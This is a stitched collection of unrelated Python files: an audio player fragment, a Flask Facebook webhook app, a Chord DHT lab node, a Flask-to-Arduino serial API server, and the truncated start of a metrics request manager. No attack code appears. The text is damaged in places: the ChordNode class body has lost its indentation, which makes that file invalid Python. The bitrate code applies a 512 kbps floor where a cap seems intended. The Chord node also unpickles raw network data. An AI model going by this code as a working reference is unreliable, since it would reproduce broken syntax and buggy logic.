                fallback = cls._probe_codec_fallback
        elif callable(method):
            probefunc = method
            fallback = cls._probe_codec_fallback
        else:
            raise TypeError("Expected str or callable for parameter 'probe', " \
                            f"not '{method.__class__.__name__}'")

        codec = bitrate = None
        # Fix: use get_running_loop() -- we are inside a coroutine, and
        # get_event_loop() is deprecated in that context.
        loop = asyncio.get_running_loop()
        try:
            # Probing shells out to ffprobe/ffmpeg, so run it in a thread.
            codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable))  # type: ignore
        except Exception:
            if not fallback:
                _log.exception("Probe '%s' using '%s' failed", method, executable)
                return  # type: ignore

            _log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
            try:
                codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable))  # type: ignore
            except Exception:
                _log.exception("Fallback probe using '%s' failed", executable)
            else:
                _log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
        else:
            _log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
        finally:
            # Deliberate best-effort contract: the return in finally swallows
            # any in-flight probe exception and yields (None, None) instead.
            return codec, bitrate

    @staticmethod
    def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
        """Probe ``source`` with ffprobe/avprobe and parse its JSON output."""
        # 'ffmpeg' -> 'ffprobe', 'avconv' -> 'avprobe'; custom paths are used as-is.
        exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
        args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
        output = subprocess.check_output(args, timeout=20)
        codec = bitrate = None

        if output:
            data = json.loads(output)
            streamdata = data['streams'][0]

            codec = streamdata.get('codec_name')
            bitrate = int(streamdata.get('bit_rate', 0))
            # NOTE(review): max() imposes a *floor* of 512 kbps; if the intent
            # was to cap at Opus' 512 kbps maximum this should be min() -- confirm.
            bitrate = max(round(bitrate/1000), 512)

        return codec, bitrate

    @staticmethod
    def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
        """Probe ``source`` by scraping ffmpeg's banner/stream dump output."""
        args = [executable, '-hide_banner', '-i', source]
        proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        out, _ = proc.communicate(timeout=20)
        output = out.decode('utf8')
        codec = bitrate = None

        codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
        if codec_match:
            codec = codec_match.group(1)

        br_match = re.search(r"(\d+) [kK]b/s", output)
        if br_match:
            # NOTE(review): same floor-vs-cap question as _probe_codec_native.
            bitrate = max(int(br_match.group(1)), 512)

        return codec, bitrate

    def read(self) -> bytes:
        # Empty bytes when the Ogg stream is exhausted signals end-of-source.
        return next(self._packet_iter, b'')

    def is_opus(self) -> bool:
        return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
    """Wraps an existing :class:`AudioSource` and adds volume control.

    This does not work on audio sources that have :meth:`AudioSource.is_opus`
    set to ``True``.

    Parameters
    ------------
    original: :class:`AudioSource`
        The original AudioSource to transform.
    volume: :class:`float`
        The initial volume to set it to.
        See :attr:`volume` for more info.

    Raises
    -------
    TypeError
        Not an audio source.
    ClientException
        The audio source is opus encoded.
    """

    def __init__(self, original: AT, volume: float = 1.0):
        # Reject anything that is not a PCM-producing AudioSource.
        if not isinstance(original, AudioSource):
            raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
        if original.is_opus():
            raise ClientException('AudioSource must not be Opus encoded.')

        self.original: AT = original
        self.volume = volume

    @property
    def volume(self) -> float:
        """Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
        return self._volume

    @volume.setter
    def volume(self, value: float) -> None:
        # Clamp negatives to silence.
        self._volume = 0.0 if value < 0.0 else value

    def cleanup(self) -> None:
        self.original.cleanup()

    def read(self) -> bytes:
        # Scale the PCM samples; volume is capped at 200% on the way out.
        return audioop.mul(self.original.read(), 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
    """Daemon thread that pulls 20ms frames from an :class:`AudioSource` and
    sends them to a ``VoiceClient`` at a steady cadence.
    """

    # Seconds per frame (OpusEncoder.FRAME_LENGTH is in milliseconds).
    DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0

    def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
        threading.Thread.__init__(self)
        self.daemon: bool = True
        self.source: AudioSource = source
        self.client: VoiceClient = client
        # Optional callback invoked with the error (or None) once playback ends.
        self.after: Optional[Callable[[Optional[Exception]], Any]] = after

        self._end: threading.Event = threading.Event()
        self._resumed: threading.Event = threading.Event()
        self._resumed.set()  # we are not paused
        self._current_error: Optional[Exception] = None
        # Shared with the voice client: set while the voice connection is up.
        self._connected: threading.Event = client._connected
        self._lock: threading.Lock = threading.Lock()

        if after is not None and not callable(after):
            raise TypeError('Expected a callable for the "after" parameter.')

    def _do_run(self) -> None:
        # loops/_start track frames sent since the last (re)start; they are
        # used to compute each frame's deadline so timing drift doesn't accumulate.
        self.loops = 0
        self._start = time.perf_counter()

        # getattr lookup speed ups
        play_audio = self.client.send_audio_packet
        self._speak(True)

        while not self._end.is_set():
            # are we paused?
            if not self._resumed.is_set():
                # wait until we aren't
                self._resumed.wait()
                continue

            # are we disconnected from voice?
            if not self._connected.is_set():
                # wait until we are connected
                self._connected.wait()
                # reset our internal data
                self.loops = 0
                self._start = time.perf_counter()

            self.loops += 1
            data = self.source.read()

            if not data:
                # Empty read means the source is exhausted.
                self.stop()
                break

            play_audio(data, encode=not self.source.is_opus())
            # Sleep until this frame's absolute deadline to keep a steady
            # 20ms cadence regardless of how long read/send took.
            next_time = self._start + self.DELAY * self.loops
            delay = max(0, self.DELAY + (next_time - time.perf_counter()))
            time.sleep(delay)

    def run(self) -> None:
        try:
            self._do_run()
        except Exception as exc:
            # Remember the error so _call_after can report it.
            self._current_error = exc
            self.stop()
        finally:
            self.source.cleanup()
            self._call_after()

    def _call_after(self) -> None:
        """Invoke the user 'after' callback (or log the error if there is none)."""
        error = self._current_error

        if self.after is not None:
            try:
                self.after(error)
            except Exception as exc:
                _log.exception('Calling the after function failed.')
                # Chain the playback error onto the callback error for context.
                exc.__context__ = error
                traceback.print_exception(type(exc), exc, exc.__traceback__)
        elif error:
            msg = f'Exception in voice thread {self.name}'
            _log.exception(msg, exc_info=error)
            print(msg, file=sys.stderr)
            traceback.print_exception(type(error), error, error.__traceback__)

    def stop(self) -> None:
        """Signal the loop to exit; also unblocks a paused player."""
        self._end.set()
        self._resumed.set()
        self._speak(False)

    def pause(self, *, update_speaking: bool = True) -> None:
        """Pause playback; optionally clear the speaking indicator."""
        self._resumed.clear()
        if update_speaking:
            self._speak(False)

    def resume(self, *, update_speaking: bool = True) -> None:
        """Resume playback, resetting the frame clock so timing stays accurate."""
        self.loops = 0
        self._start = time.perf_counter()
        self._resumed.set()
        if update_speaking:
            self._speak(True)

    def is_playing(self) -> bool:
        return self._resumed.is_set() and not self._end.is_set()

    def is_paused(self) -> bool:
        return not self._end.is_set() and not self._resumed.is_set()

    def _set_source(self, source: AudioSource) -> None:
        # Swap sources atomically with respect to other _set_source calls;
        # pause/resume without touching the speaking state.
        with self._lock:
            self.pause(update_speaking=False)
            self.source = source
            self.resume(update_speaking=False)

    def _speak(self, speaking: bool) -> None:
        """Best-effort update of the speaking state on the voice websocket."""
        try:
            asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
        except Exception as e:
            _log.info("Speaking call in player failed: %s", e)
|
app.py | from flask import Flask, render_template, request, jsonify
from datetime import datetime
from pytz import timezone
from connector import facebook
import my_crypto
import atexit
import cf_deployment_tracker
import os
import json
import threading
# Emit Bluemix deployment event
cf_deployment_tracker.track()

app = Flask(__name__)
# Port comes from the environment (Cloud Foundry style), defaulting to 8000.
port = int(os.getenv('PORT', 8000))
# NOTE(review): this rebinding shadows the imported ``my_crypto`` module with
# a MyCrypto instance; the module itself is unreachable after this line.
my_crypto = my_crypto.MyCrypto()
@app.route('/', methods=['GET'])
def verify():
    """Handle the Facebook webhook verification handshake (GET /).

    ``facebook.verify`` returns the response to echo back, or ``None`` when
    there is nothing to echo, in which case a plain 200 is returned.
    """
    resp = facebook.verify(request)
    # Fix: compare against None with ``is`` (identity), not ``==``.
    if resp is None:
        return "ok", 200
    return resp
@app.route('/', methods=['POST'])
def hook():
    """Webhook endpoint: acknowledge immediately, process in the background."""
    payload = facebook.handle(request)
    # Offload the actual work so Facebook gets its 200 without waiting.
    worker = threading.Thread(target=handle, args=(payload,))
    worker.start()
    return "ok", 200
def handle(resp):
    """Background worker: forward the parsed webhook payload to MyCrypto."""
    my_crypto.handle(resp)
if __name__ == '__main__':
    # NOTE(review): debug=True enables the werkzeug debugger/reloader --
    # do not run with this flag in production.
    app.run(host='0.0.0.0', port=port, debug=True)
|
chord_node.py | """
CPSC 5520, Seattle University
:Authors: Fariha Zainab
:Version: f19-02
:Assignment: Lab4 - DHT-CHORD
"""
"""
Start the chord_node by giving the port no. 0 to start the network
The node will print it's finger table, its address and predecessor.
When the next node joins the network, it can take the port no. from the address printed by previous nodes
"""
import sys
import socket
import csv
import hashlib
import pickle
import selectors
import threading
# Identifier-space size in bits.  Real Chord uses 160 (SHA-1); kept at 5 here
# for easier debugging of small rings -- TODO confirm before scaling up.
M_BITS = 5  # 160
NODES = 2**M_BITS  # number of slots on the identifier circle

# RPC request-type tags exchanged between nodes.
FIND_SUCCESSOR_REQUEST = "FIND_SUCCESSOR_REQUEST"
GET_PREDECESSOR_REQUEST = "GET_PREDECESSOR_REQUEST"
GET_SUCCESSOR_REQUEST = "GET_SUCCESSOR_REQUEST"
CLOSEST_PRECEDING_FINGER_REQUEST = "CLOSEST_PRECEDING_FINGER_REQUEST"
UPDATE_FINGER_TABLE_REQUEST = "UPDATE_FINGER_TABLE_REQUEST"
ADD_OR_UPDATE_ENTRY_REQUEST = "ADD_OR_UPDATE_ENTRY_REQUEST"
GET_ENTRY_REQUEST = 'GET_ENTRY_REQUEST'
# LOCAL_* variants operate on the receiving node's own data store.
LOCAL_ADD_OR_UPDATE_ENTRY_REQUEST = "LOCAL_ADD_OR_UPDATE_ENTRY_REQUEST"
LOCAL_GET_ENTRY_REQUEST = 'LOCAL_GET_ENTRY_REQUEST'

# Keys of the pickled argument dictionary carried by every RPC.
RPC_ARG_REQUEST_TYPE = 'RPC_ARG_REQUEST_TYPE'
RPC_ARG_NODE_INFO = 'RPC_ARG_NODE_INFO'
RPC_ARG_KEY = 'RPC_ARG_KEY'
RPC_ARG_VALUE = 'RPC_ARG_VALUE'
RPC_ARG_ID = 'RPC_ARG_ID'
RPC_ARG_INDEX = 'RPC_ARG_INDEX'

BUFFER_SIZE = 4096  # max bytes read per socket recv
BACKLOG = 100       # listen() backlog
class NodeInfo(object):
    """Lightweight record of a peer: its hash identifier and its address."""

    def __init__(self, hashValue, address):
        # (host, port) tuple used to reach the node.
        self.Address = address
        # Position of the node on the identifier circle.
        self.HashValue = hashValue
class FingerTableEntry(object):
    """One row of a node's finger table: start id, covered interval, successor."""

    def __init__(self):
        # All fields are populated later by ChordNode.CreateFingerTable /
        # InitFingerTable; the placeholder NodeInfo carries no identity yet.
        self.Node = NodeInfo(None, None)
        self.Interval = None
        self.Start = None
class ChordNode(object):
"""
class for handling all the functionalities of the node
"""
def __init__(self):
self.fingerTable = {}
self.localData = {}
self.predecessor = None
self.nodeHashValue = None
self.selfNodeAddress = None
self.nodeInfo = None
self.listenSocket = None
self.initialNodeAddress = None
self.hasJoined = False
for i in range(1, M_BITS+1):
self.fingerTable[i] = FingerTableEntry()
def GetHashKey(self, key):
"""
Using SHA-1 for creating a hash value for the object
:param key: object we want to create hash value for
"""
data = pickle.dumps(key)
hashObject = hashlib.sha1(data)
hashValue = hashObject.hexdigest()
value = int(hashValue, 16)
return value
def CreateListenSocket(self):
"""
Create the server socket for the node
"""
self.listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listenSocket.bind(('localhost', 0))
self.listenSocket.listen(BACKLOG)
self.listenSocket.setblocking(False)
return self.listenSocket
def WaitForRequest(self):
"""
Creating thread for each request
"""
selector = selectors.DefaultSelector()
selector.register(self.listenSocket, selectors.EVENT_READ)
while True:
events = selector.select(timeout = 10)
for __, __ in events:
self.listenSocket.setblocking(True)
sock, address = self.listenSocket.accept()
self.listenSocket.setblocking(False)
bgThread = threading.Thread(target=self.HandleRemoteCall, args=(sock, address))
bgThread.start()
def HandleRemoteCall(self, sock, address):
"""
Handle the RPC calls coming from different nodes
"""
sock.setblocking(True)
rpcArgs = pickle.loads(sock.recv(BUFFER_SIZE))
print(f"Received RPC for {rpcArgs[RPC_ARG_REQUEST_TYPE]} to {address}")
value = {}
if(rpcArgs[RPC_ARG_REQUEST_TYPE] == FIND_SUCCESSOR_REQUEST):
value = self.FindSuccessor(rpcArgs[RPC_ARG_ID])
elif (rpcArgs[RPC_ARG_REQUEST_TYPE] == GET_PREDECESSOR_REQUEST):
remoteNodePredecessor = self.predecessor
self.predecessor = rpcArgs[RPC_ARG_NODE_INFO]
value = remoteNodePredecessor
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == GET_SUCCESSOR_REQUEST:
value = self.fingerTable[1].Node
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == CLOSEST_PRECEDING_FINGER_REQUEST:
value = self.ClosestPrecedingFinger(rpcArgs[RPC_ARG_ID])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == UPDATE_FINGER_TABLE_REQUEST:
self.UpdateFingerTable(rpcArgs[RPC_ARG_INDEX], rpcArgs[RPC_ARG_NODE_INFO])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == ADD_OR_UPDATE_ENTRY_REQUEST:
self.AddOrUpdateEntry(rpcArgs[RPC_ARG_KEY], rpcArgs[RPC_ARG_VALUE])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == GET_ENTRY_REQUEST:
value = self.GetEntry(rpcArgs[RPC_ARG_KEY])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == LOCAL_ADD_OR_UPDATE_ENTRY_REQUEST:
self.LocalAddOrUpdateEntry(rpcArgs[RPC_ARG_KEY], rpcArgs[RPC_ARG_VALUE])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == LOCAL_GET_ENTRY_REQUEST:
value = self.LocalGetEntry(rpcArgs[RPC_ARG_KEY])
sock.sendall(pickle.dumps(value))
self.ShutDownSocket(sock)
def CreateAClientSocket(self, address):
"""
creating the client socket of the node to send request
:param address: address of the node on which request is to be sent
"""
requestSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
requestSocket.setblocking(True)
requestSocket.connect(address)
return requestSocket
def RemoteCall(self, address, argDict):
"""
Making the RPC call to the nodes
:param address: address of the node on which the node will make an RPC
:param argDict: dictionary contaiining all the data to be sent for processing on the node
"""
print(f"Making RPC for {argDict[RPC_ARG_REQUEST_TYPE]} to {address}")
requestSocket = self.CreateAClientSocket(address)
requestByteArray = pickle.dumps(argDict)
requestSocket.sendall(requestByteArray)
requestSocket.shutdown(socket.SHUT_WR)
value = pickle.loads(requestSocket.recv(BUFFER_SIZE))
requestSocket.shutdown(socket.SHUT_RD)
requestSocket.close()
return value
def ShutDownSocket(self, s):
"""
Utility function to shut down the socket
"""
try:
s.shutdown(socket.SHUT_RDWR)
s.close()
except socket.error:
pass
def GetEntry(self, key):
"""
Handle the query for the key
:param key: key value queried by the user
"""
keyId = self.GetHashKey(key)
succNode = self.FindSuccessor(keyId)
return self.RemoteGetEntry(succNode.Address, key)
def AddOrUpdateEntry(self, key, value):
"""
Handle the add or update of the key and values in the chord network
"""
keyId = self.GetHashKey(key)
succNode = self.FindSuccessor(keyId)
self.RemoteAddOrUpdateEntry(succNode.Address, key, value)
def LocalAddOrUpdateEntry(self, key, value):
"""
add or update the keys and values in the node locally
"""
self.localData[key] = value
def LocalGetEntry(self, key):
"""
local method to get the value for the key queried by the user
"""
if key in self.localData:
return self.localData[key]
return None
def RemoteAddOrUpdateEntry(self, destAddress, key, value):
"""
Handle the remote call for adding and updating the entry in the chord network
:param destAddress: address of the node to make an RPC call
:param key: key to be added
:param value: value related to that key
"""
if(destAddress == self.selfNodeAddress):
self.LocalAddOrUpdateEntry(key, value)
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = LOCAL_ADD_OR_UPDATE_ENTRY_REQUEST
argDict[RPC_ARG_KEY] = key
argDict[RPC_ARG_VALUE] = value
self.RemoteCall(destAddress, argDict)
def RemoteGetEntry(self, destAddress, key):
"""
Handles remote call to get the value of entry queried by the user
:param destAddress: address of the node to make an RPC call
:param key: key to be queried
"""
if(destAddress == self.selfNodeAddress):
return self.LocalGetEntry(key)
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = LOCAL_GET_ENTRY_REQUEST
argDict[RPC_ARG_KEY] = key
return self.RemoteCall(destAddress, argDict)
def RemoteFindSuccessor(self, destAddress, id):
"""
Handles the remote call to find the successor of the node
:param destAddress: address of the remote note
:param id: id of the node, we want to know the successor node for
"""
if(destAddress == self.selfNodeAddress):
value = self.FindSuccessor(id)
return value
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = FIND_SUCCESSOR_REQUEST
argDict[RPC_ARG_ID] = id
successor = self.RemoteCall(destAddress, argDict)
return successor
def RemoteGetAndSetPredecessor(self, destAddress, node):
"""
Handles remote call to get and set the predecessor for the node
:param destAddress: address of the remote note
:param node: node details we want to know the predecessor of
"""
if(destAddress == self.selfNodeAddress):
return self.predecessor
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = GET_PREDECESSOR_REQUEST
argDict[RPC_ARG_NODE_INFO] = node
predecessor = self.RemoteCall(destAddress, argDict)
return predecessor
def RemoteGetSuccessor(self, destAddress):
"""
Handles remote call to get the successor of the given node
:param destAddress: address of the remote note
"""
if (destAddress == self.selfNodeAddress):
return self.fingerTable[1].Node
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = GET_SUCCESSOR_REQUEST
successor = self.RemoteCall(destAddress, argDict)
return successor
def RemoteClosestPrecedingFinger(self, destAddress, id):
"""
Handles remote call to find the closest preceding node for the given node
:param destAddress: address of the remote note
:param id: id of the node we want the closest preceding finger for
"""
if(destAddress == self.selfNodeAddress):
value = self.ClosestPrecedingFinger(id)
return value
argDict = {}
argDict[RPC_ARG_ID] = id
argDict[RPC_ARG_REQUEST_TYPE] = CLOSEST_PRECEDING_FINGER_REQUEST
precedingFinger = self.RemoteCall(destAddress, argDict)
return precedingFinger
def RemoteUpdateFingerTable(self, destAddress, fingerTableIndex, node):
"""
Handles remote call to update the finger table of all the nodes that have the entry for the given node
:param destAddress: address of the remote note
:param fingerTableIndex: row number of teh finger table
:param node: the details of the given node
"""
if(destAddress == self.selfNodeAddress):
self.UpdateFingerTable(fingerTableIndex, node)
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = UPDATE_FINGER_TABLE_REQUEST
argDict[RPC_ARG_INDEX] = fingerTableIndex
argDict[RPC_ARG_NODE_INFO] = node
self.RemoteCall(destAddress, argDict)
def InitFingerTable(self, initialNodeAddress):
"""
Method to intialise the finger table for a given node when it joins the chord network
:param initialNodeAddress: the address of the chord node used by this node to join the network
"""
self.fingerTable[1].Node = self.RemoteFindSuccessor(initialNodeAddress, self.fingerTable[1].Start)
self.predecessor = self.RemoteGetAndSetPredecessor(self.fingerTable[1].Node.Address, self.nodeInfo)
for i in range(1, M_BITS):
if self.IsInRange(self.fingerTable[i+1].Start, self.nodeInfo.HashValue, True, self.fingerTable[i].Node.HashValue, False):
self.fingerTable[i+1].Node = self.fingerTable[i].Node
else:
node = self.RemoteFindSuccessor(initialNodeAddress, self.fingerTable[i+1].Start)
self.fingerTable[i+1].Node = node
def CreateFingerTable(self):
"""
Create the finger table for the node
"""
for i in range(1, M_BITS+1):
self.fingerTable[i].Start = ((self.nodeHashValue + (2**(i-1))) % NODES)
for i in range(1, M_BITS+1):
if(i < M_BITS):
self.fingerTable[i].Interval = range(self.fingerTable[i].Start, self.fingerTable[i+1].Start)
else:
lastIntervalEntry = (self.nodeHashValue + 2**M_BITS)% 2**M_BITS
self.fingerTable[i].Interval = range(self.fingerTable[i].Start, lastIntervalEntry)
def FindSuccessor(self, id):
"""
Local method to find the successor of the node
:param id: id of the node we want the successor of
"""
node = self.FindPredeccesor(id)
return self.RemoteGetSuccessor(node.Address)
def FindPredeccesor(self, id):
"""
Local method to find the predecessor of the node
:param id: id of the node we want the predecessor of
"""
node = self.nodeInfo
while True:
succNode = self.RemoteGetSuccessor(node.Address)
if self.IsInRange(id, node.HashValue, False,succNode.HashValue, True) == False:
node = self.RemoteClosestPrecedingFinger(node.Address, id)
else:
break
return node
def ClosestPrecedingFinger(self, id):
"""
Local method to find the closest preceding finger of the node
:param id: id of the node we want the closest preceding finger for
"""
for i in range(M_BITS, 0, -1):
if self.IsInRange(self.fingerTable[i].Node.HashValue, self.nodeInfo.HashValue, False, id, False):
return self.fingerTable[i].Node
return self.nodeInfo
def UpdateOthers(self):
"""
Local method to update the finger table entries
"""
for i in range(1, M_BITS+1):
predNode = self.FindPredeccesor((1 + self.nodeHashValue - 2**(i-1) + NODES) % NODES)
self.RemoteUpdateFingerTable(predNode.Address, i, self.nodeInfo)
def UpdateFingerTable(self, i, s):
"""
local call to update finger table entries
"""
""" if s is i-th finger of n, update this node's finger table with s """
ftEntry = self.fingerTable[i]
# FIXME: don't want e.g. [1, 1) which is the whole circle
# FIXME: bug in paper, [.start
if (ftEntry.Start != ftEntry.Node.HashValue and self.IsInRange(s.HashValue, ftEntry.Start, True, ftEntry.Node.HashValue, False)):
self.fingerTable[i].Node = s
self.PrintFingerTable()
self.RemoteUpdateFingerTable(self.predecessor.Address, i, s)
def NodeJoin(self, host, port):
"""
Method to join the node in the chord network
"""
self.selfNodeAddress = self.listenSocket.getsockname()
self.nodeHashValue = self.GetHashKey(self.selfNodeAddress)
self.nodeInfo = NodeInfo(self.nodeHashValue, self.selfNodeAddress)
self.initialNodeAddress = (host, port)
self.CreateFingerTable()
if(port == 0):
for i in range(1, M_BITS+1):
self.fingerTable[i].Node = self.nodeInfo
self.predecessor = self.nodeInfo
else:
self.InitFingerTable(self.initialNodeAddress)
self.UpdateOthers()
self.hasJoined = True
self.PrintFingerTable()
print("Node Address is {}".format(self.selfNodeAddress))
print("Node joined successfully.")
def PrintFingerTable(self):
    """
    Dump the current finger table and predecessor to stdout.

    No-op until the node has joined the ring.
    """
    if not self.hasJoined:
        return
    separator = "---------------------------------------------"
    print("")
    print(separator)
    for v in self.fingerTable.values():
        print(f"Start={v.Start}, Interval={v.Interval}, Node=({v.Node.HashValue}, {v.Node.Address})")
    print(separator)
    print(f"Predecessor=({self.predecessor.HashValue}, {self.predecessor.Address})")
def IsInRange(self, id, start, isStartInclusive, end, isEndInclusive):
    """
    Test whether ``id`` lies inside a circular interval on the ring.

    Endpoint inclusivity is controlled by the two flags; the interval
    wraps modulo NODES when, after normalization, start >= end.
    """
    # Normalize both endpoints to a half-open [start, end) interval.
    if not isStartInclusive:
        start = (start + 1) % NODES
    if isEndInclusive:
        end = (end + 1) % NODES
    if start < end:
        return start <= id < end
    # Wrapped interval: [start, NODES) followed by [0, end).
    return start <= id < NODES or 0 <= id < end
if __name__ == "__main__":
    # Original argv parsing kept for reference; the port is currently
    # hard-coded to 0, which makes this node bootstrap a new ring.
    #if len(sys.argv) != 2:
    # print("Please enter the port number")
    # exit(1)
    host = 'localhost'
    port = 0#int(sys.argv[1])
    node = ChordNode()
    node.CreateListenSocket()
    # Join the ring on a background thread; the main thread serves requests.
    bgThread = threading.Thread(target=node.NodeJoin, args=(host, port))
    bgThread.start()
    node.WaitForRequest()
|
api_server.py | # ------------------------------------------------------------------------------
# name : api_server.js
# author : Noe Flatreaud (Retr0)
# description:
# simple API server for the IHC-controller project
# it provide an API url as well as a basic dashboard so you can
# use it every were by using the web browser.
# you can as well create a third-pary app and use the api url.
# ------------------------------------------------------------------------------
import serial
import threading
import time
from flask import *
app = Flask(__name__)
# ------------------------------------------------------------------------------
# Arduino Serial
# ------------------------------------------------------------------------------
# Opened at import time; COM4 is hard-coded, so the server fails to start
# if the board is attached to a different port.
arduino = serial.Serial(port='COM4', baudrate=9600, timeout=.1)
#def write_read(x):
# arduino.write(bytes(x, 'utf-8'))
# time.sleep(0.05)
# data = arduino.readline()
# return data
# ------------------------------------------------------------------------------
# Routes
# ------------------------------------------------------------------------------
# default route
@app.route('/')
def index():
    """Serve the dashboard page."""
    return render_template('index.html')
# API route
@app.route('/api', methods=['GET'])
def api():
    """
    Forward an (output, value) command pair to the Arduino.

    Expects integer query parameters ``output`` and ``value``; the pair is
    written to the board as two raw bytes. Responds 400 when the parameters
    are missing, non-numeric, or outside the 0-255 byte range.
    """
    try:
        output = int(request.args['output'])
        value = int(request.args['value'])
        # bytes() raises ValueError for anything outside 0-255, so build
        # the payload inside the try block rather than after it.
        payload = bytes([output, value])
    except Exception as e:
        data = "Oops Something went wrong !!<br> {0}".format(str(e))
        # BUG FIX: 413 (Request Entity Too Large) misstated the failure;
        # a bad/missing client parameter is 400 Bad Request.
        return data, 400  # HTTP_400_BAD_REQUEST
    else:
        arduino.write(payload)
        return "OK", 200  # HTTP_200_OK
# allow javascript index.js to be imported !
@app.route('/index.js')
def js():
    """Serve the dashboard's client-side script through the template engine."""
    return render_template('index.js')
def io_thread():
    """Background daemon placeholder: announce itself, then idle forever."""
    print("Started new Daemon")
    while True:
        time.sleep(1)
# ------------------------------------------------------------------------------
# Main
# ------------------------------------------------------------------------------
if __name__ == "__main__":
    # Daemon thread dies with the main process, so no join is needed.
    io = threading.Thread(target = io_thread, daemon = True)
    io.start();
    # run flask server
    app.run(host='0.0.0.0')
|
request_manager.py | """
This module implements the request manager functionality.
Job Queue and Processing
^^^^^^^^^^^^^^^^^^^^^^^^
As requests are issued via http to the API a process queue will store all
active jobs. Processes will be created and assume one of the following
states throughout their existence: ::
* 'pending' - The request has yet to begin being processed
* 'running' - The request is being processed
* 'success' - The request has finished processing and is exposed at
the url
* 'failure' - The request has finished processing but failed to expose
results
When a request is received and a job is created to service that
request it enters the 'pending' state. If the job returns without
exception it enters the 'success' state, otherwise it enters the 'failure'
state. The job remains in either of these states until it is cleared
from the process queue.
Response Data
^^^^^^^^^^^^^
As requests are made to the API the data is generated and formatted as JSON.
The definition is as follows: ::
{ header : header_list,
cohort_expr : cohort_gen_timestamp : metric : timeseries :
aggregator : start : end : [ metric_param : ]* : data
}
Where each component is defined: ::
header_str := list(str), list of header values
cohort_expr := str, cohort ID expression
cohort_gen_timestamp := str, cohort generation timestamp (earliest of
all cohorts in expression)
metric := str, user metric handle
timeseries := boolean, indicates if this is a timeseries
aggregator := str, aggregator used
start := str, start datetime of request
end := str, end datetime of request
metric_param := -, optional metric parameters
data := list(tuple), set of data points
Request data is mapped to a query via metric objects and hashed in the
dictionary `api_data`.
Request Flow Management
^^^^^^^^^^^^^^^^^^^^^^^
This portion of the module defines a set of methods useful in handling
series of metrics objects to build more complex results. This generally
involves creating one or more UserMetric derived objects with passed
parameters to service a request. The primary entry point is the
``process_data_request`` method. This method coordinates requests for
three different top-level request types:
- **Raw requests**. Output is a set of datapoints that consist of the
user IDs accompanied by metric results.
- **Aggregate requests**. Output is an aggregate of all user results based
on the type of aggregation as defined in the aggregator module.
- **Time series requests**. Outputs a time series list of data. For this
type of request a start and end time must be defined along with an
interval length. Further an aggregator must be provided which operates
on each time interval.
Also defined are metric types for which requests may be made with
``metric_dict``, and the types of aggregators that may be called on metrics
``aggregator_dict``, and also the meta data around how many threads may be
used to process metrics ``USER_THREADS`` and ``REVISION_THREADS``.
"""
__author__ = {
"ryan faulkner": "rfaulkner@wikimedia.org"
}
__date__ = "2013-03-05"
__license__ = "GPL (version 2 or later)"
from user_metrics.config import logging, settings
from user_metrics.api import MetricsAPIError, error_codes, query_mod
from user_metrics.api.engine.data import get_users
from user_metrics.api.engine.request_meta import rebuild_unpacked_request
from user_metrics.metrics.users import MediaWikiUser
from user_metrics.metrics.user_metric import UserMetricError
from user_metrics.utils import unpack_fields
from multiprocessing import Process, Queue
from collections import namedtuple
from os import getpid
from sys import getsizeof
from Queue import Empty
from time import sleep
# API JOB HANDLER
# ###############
# API queues for API service requests and responses
api_request_queue = Queue()
api_response_queue = Queue()
# MODULE CONSTANTS
#
# 1. Determines maximum block size of queue item
# 2. Number of maximum concurrently running jobs
# 3. Time to block on waiting for a new request to appear in the queue
MAX_BLOCK_SIZE = 5000
MAX_CONCURRENT_JOBS = 1
QUEUE_WAIT = 5
# Defines the job item type used to temporarily store job progress
job_item_type = namedtuple('JobItem', 'id process request queue')
def job_control(request_queue, response_queue):
    """
    Controls the execution of user metrics requests.

    Runs forever: pulls new requests off ``request_queue``, parks them in a
    wait queue until a worker slot is free, forks ``process_metrics``
    workers (at most MAX_CONCURRENT_JOBS + 1), and forwards finished
    workers' output onto ``response_queue``.

    Parameters
    ~~~~~~~~~~
    request_queue : multiprocessing.Queue
        Queues incoming API requests.
    response_queue : multiprocessing.Queue
        Receives request credentials followed by result data for each
        finished job.
    """
    # Store executed and pending jobs respectively
    job_queue = list()
    wait_queue = list()
    # Global job ID number
    job_id = 0
    # Tallies the number of concurrently running jobs
    concurrent_jobs = 0
    log_name = '{0} :: {1}'.format(__name__, job_control.__name__)
    logging.debug('{0} - STARTING...'.format(log_name))
    while 1:
        # Request Queue Processing
        # ------------------------
        try:
            # Pull an item off of the queue
            req_item = request_queue.get(timeout=QUEUE_WAIT)
            logging.debug(log_name + ' :: PULLING item from request queue -> ' \
